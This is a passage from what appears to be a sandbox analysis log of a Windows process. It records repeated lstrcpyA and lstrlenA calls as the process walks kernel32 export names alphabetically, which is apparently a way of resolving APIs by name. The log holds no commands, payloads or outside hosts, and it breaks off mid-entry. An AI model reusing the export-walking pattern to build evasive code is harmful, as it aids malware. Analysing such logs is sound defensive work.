returned="CheckNameLegalDOS8Dot3W" [0083.351] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.351] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.351] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.351] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.351] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.351] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.351] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.351] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.351] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.351] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.351] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.351] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.351] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.351] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.352] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.352] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.352] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.352] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.352] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.352] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.352] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.352] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.352] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.352] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.352] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.352] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.352] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.352] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.352] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.352] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.352] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.352] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.352] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.353] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.353] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.353] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.353] lstrlenA (lpString="COPYFILEA") returned 9 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.353] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.353] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.353] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.353] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.353] lstrlenA (lpString="COPYFILEW") returned 9 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.353] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.353] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.353] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.353] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.353] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.353] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.353] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.353] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.353] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.353] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.353] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.354] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.354] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.354] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.354] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.354] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.354] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.354] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.354] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.354] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.354] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.354] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.354] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.354] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.354] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.354] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.354] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.354] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.354] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.354] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.355] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.355] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.355] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.355] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.355] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.355] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.355] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.355] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.355] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.355] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.355] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.355] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.355] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.355] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.355] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.355] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.355] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.355] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.355] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.356] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.356] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.356] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.356] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.356] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.356] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.356] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.356] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.356] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.356] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.356] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.356] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.356] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.356] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.356] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.356] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.356] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.356] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.356] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.356] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.357] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.357] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.357] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.357] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.357] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.357] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.357] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.357] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.357] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.357] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.357] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.357] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.357] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.357] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.357] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.357] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.357] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.357] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.357] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.358] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.358] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.358] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.358] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.358] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: 